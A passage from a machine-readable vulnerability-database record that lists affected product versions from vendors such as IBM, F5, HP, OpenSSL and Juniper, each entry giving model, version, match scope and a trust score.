"scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "algo audit and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "aspera connect server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.4.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "cognos insight", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.2.4" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.0" }, { "model": "big-ip psm hf15", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aspera enterprise server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.4" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "flex system fc5022 16gb san scalable switch 7.3.0a", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "abyp-0t-2s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "virtual connect enterprise manager sdk", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.41" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "integration bus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.21" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1" }, { "model": "initiate master data service", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.0-14" }, { "model": "big-ip gtm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "big-ip link controller hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "sametime community server hf1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.2" }, { "model": "project openssl 0.9.8ze", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip edge gateway hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.04" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.5" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "project openssl 1.0.0o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.2" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.146" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7779" }, { "model": "big-ip gtm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.7.1" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5" }, { "model": "sametime community server limited use", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.02" }, { "model": "system storage san04b-r", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "hp-ux b.11.31 (11i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "v3)" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "big-ip link controller hf2", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "big-ip ltm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip link controller hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.20" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip analytics hf9", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "idp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.12.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.40" }, { "model": "abyp-0t-2s-2l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "aspera enterprise server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.2" }, { "model": "ctpos 7.0r4", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "big-ip analytics hf5", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14" }, { "model": "abyp-2t-0s-2l-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.32" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.15210" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.9.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.64" }, { "model": "abyp-10g-4sr-1-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm hf2", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "security network controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "alienvault", "scope": "ne", "trust": 0.3, "vendor": "alienvault", "version": "5.0" }, { "model": "flex system en4023 10gb scalable switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "big-ip gtm hf9", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.8" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "version control repository manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.740" }, { "model": "icewall sso dfw r2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "ddos secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "big-ip aam", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4.0" }, { "model": "system management homepage 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.411" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.213" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.7.3.0" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.2.0" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "system storage san42b-r", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.3" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.0.0" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4.1" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.9.2" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.3" }, { "model": "big-ip ltm hf5", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf5", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip apm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "algo one pcre", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.9" }, { "model": "ringmaster appliance", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "big-iq security hf3", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "4.5" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.28" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "campaign", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.21" }, { "model": "sterling connect:express for unix ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.6.1146-108" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aspera enterprise server", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.5.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "big-ip link controller", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "cognos controller fp1 if1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.1" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "aspera console", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.0.0" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8.0" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "vgw", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "big-ip apm hf9", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.1.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6.0" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aspera shares", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.7.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.2.835" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.41" }, { "model": "infosphere guardium for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10.1" }, { "model": "icewall sso agent option", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "big-ip link controller hf15", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip link controller", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1.0" }, { "model": "abyp-10g-4sr-1-p", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.33" }, { "model": "src series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "openssh for gpfs", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "big-ip ltm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.4" }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0.1" }, { "model": "icewall sso dfw", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.4.3.0" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.3.0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "3.0" }, { "model": "big-ip edge gateway 11.1.0-hf3", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.26" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2.106" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "virtual connect enterprise manager sdk", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.0" }, { "model": "big-ip pem hf2", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.5.3" }, { "model": "systems insight manager sp3", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "big-ip asm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "12.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.3.1.0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "abyp-0t-4s-0l-p-m", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.03" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.1.830" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip link controller hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip ltm", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.1" }, { "model": "aspera faspex", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "3.7.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "big-ip link controller hf5", "scope": "ne", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.5.1.1" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "contactoptimization", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14.20" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.760" }, { "model": "aspera drive", "scope": "eq", "trust": 0.3, "vendor": "asperasoft", "version": "1.2.1" }, { "model": "algo one core", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "system storage san768b", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "big-ip gtm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "big-ip link controller hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "rational clearcase", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.3" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.50" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "predictiveinsight", "scope": "eq", "trust": 0.3, 